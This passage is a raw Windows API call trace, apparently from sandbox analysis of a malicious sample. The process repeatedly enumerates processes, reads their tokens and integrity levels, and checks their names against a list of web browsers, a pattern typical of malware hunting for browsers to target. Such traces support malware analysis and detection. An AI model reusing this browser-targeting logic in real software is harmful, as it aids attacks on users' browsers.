IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0557.141] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0557.141] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0557.141] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0557.141] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0557.141] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0557.141] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0557.141] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0557.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0557.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0557.141] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0557.142] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0557.142] GetLastError () returned 0x7a [0557.142] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0557.142] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0557.142] CloseHandle (hObject=0x29c) returned 1 [0557.142] CloseHandle (hObject=0x298) returned 1 [0557.142] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0557.142] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0557.143] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0557.143] GetLastError () returned 0x7a [0557.143] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0557.143] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0557.143] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0557.143] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0557.143] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0557.143] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0557.143] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0557.143] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0557.144] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0557.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0557.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0557.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0557.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0557.144] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0557.144] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0557.144] GetLastError () returned 0x7a [0557.144] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0557.144] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0557.145] CloseHandle (hObject=0x29c) returned 1 [0557.145] CloseHandle (hObject=0x298) returned 1 [0557.145] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0557.145] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0557.145] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0557.145] GetLastError () returned 0x7a [0557.145] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0557.145] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0557.146] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0557.146] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0557.146] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0557.146] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0557.146] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0557.146] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0557.146] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0557.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0557.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0557.146] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0557.147] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0559.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa228) returned 0xc0000004 [0559.158] VirtualAlloc (lpAddress=0x0, dwSize=0xb228, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0559.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb228, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0559.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0559.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0559.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0559.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0559.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0559.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0559.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0559.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0559.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0559.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0559.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0559.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0559.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0559.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0559.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0559.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0559.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0559.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0559.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0559.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0559.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0559.161] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0559.161] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0559.161] GetLastError () returned 0x7a [0559.161] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0559.161] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0559.162] CloseHandle (hObject=0x29c) returned 1 [0559.162] CloseHandle (hObject=0x298) returned 1 [0559.162] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0559.162] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0559.162] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0559.162] GetLastError () returned 0x7a [0559.162] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0559.162] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0559.162] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0559.162] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0559.162] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0559.162] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0559.163] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0559.163] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0559.163] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0559.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0559.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0559.163] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0559.163] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0559.163] GetLastError () returned 0x7a [0559.163] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0559.163] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0559.163] CloseHandle (hObject=0x29c) returned 1 [0559.163] CloseHandle (hObject=0x298) returned 1 [0559.163] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0559.163] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0559.164] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0559.164] GetLastError () returned 0x7a [0559.164] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0559.164] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0559.164] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0559.164] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0559.164] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0559.164] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0559.164] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0559.164] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0559.164] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0559.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0559.164] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0559.164] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0559.165] GetLastError () returned 0x7a [0559.165] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0559.165] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0559.165] CloseHandle (hObject=0x29c) returned 1 [0559.165] CloseHandle (hObject=0x298) returned 1 [0559.165] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0559.165] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0559.165] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0559.165] GetLastError () returned 0x7a [0559.165] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0559.165] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0559.165] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0559.166] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0559.166] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0559.166] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0559.166] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0559.166] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0559.166] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0559.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0559.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0559.166] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0559.166] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0559.166] GetLastError () returned 0x7a [0559.166] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0559.166] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0559.166] CloseHandle (hObject=0x29c) returned 1 [0559.166] CloseHandle (hObject=0x298) returned 1 [0559.167] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0559.167] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0559.167] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0559.167] GetLastError () returned 0x7a [0559.167] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0559.167] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0559.167] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0559.167] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0559.167] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0559.167] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0559.167] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0559.167] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0559.167] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0559.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0559.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0559.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0559.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0559.168] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0559.168] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0559.168] GetLastError () returned 0x7a [0559.168] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0559.168] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0559.168] CloseHandle (hObject=0x29c) returned 1 [0559.168] CloseHandle (hObject=0x298) returned 1 [0559.168] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0559.168] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0559.168] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0559.169] GetLastError () returned 0x7a [0559.169] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0559.169] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0559.169] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0559.169] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0559.169] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0559.169] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0559.169] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0559.169] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0559.169] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0559.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0559.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0559.169] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0559.170] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0561.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa1d8) returned 0xc0000004 [0561.170] VirtualAlloc (lpAddress=0x0, dwSize=0xb1d8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0561.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb1d8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0561.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) 